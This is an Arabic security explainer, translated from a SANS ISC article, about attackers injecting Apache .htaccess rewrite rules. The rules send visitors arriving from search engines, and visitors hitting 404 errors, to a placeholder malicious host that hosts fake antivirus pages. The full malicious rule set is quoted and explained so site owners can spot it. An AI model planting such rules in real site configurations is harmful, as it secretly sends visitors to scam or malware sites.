قام الأشخاص السيئون (crackers) باستغلال RewriteEngine في apache بطريقة سيئة لتحويل الزوار إلى مواقع مزورة لمنتجي برامج مكافحة الفيروس. خاصية RewriteEngine يمكن تفعيلها من خلال ملف htaccess لاحظ المثال التالي:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://BAD_SITE/in.html?s=hg [R,L]
Errordocument 404 http://BAD_SITE/in.html?s=hg_err
RewriteEngine On
سوف تفعل الخاصية
الجمل الست التي تليها هي شروط إعادة كتابة العنوان.
هذه الجمل تفحص ال HTTP_REFERER وكما هو ظاهر فهي تتضمن بعض أشهر محركات البحث. عند تحقق أي شرط من هذه الشروط سيتم تنفيذ جملة RewriteRule.
كما هو ظاهر من الصيغة أعلاه فهي طريقة خبيثة للغاية حيث أن المستخدم عند زيارته للموقع من خلال عنوان الموقع المباشر فلا شيء سوف يحدث لكن حين زيارته من خلال موقع بحث من المواقع المذكورة في الشروط فسوف يتم تحويل المستخدم إلى الموقع المزور.
لذلك إذا كان لديك موقع يستخدم htaccess (أو حتى لا يستخدمه) فقم بفحصه وتأكد من أنه لم يتم تغييره.
ملاحظة: هذا شرح مترجم لمقالة وردت في موقع isc.sans.org
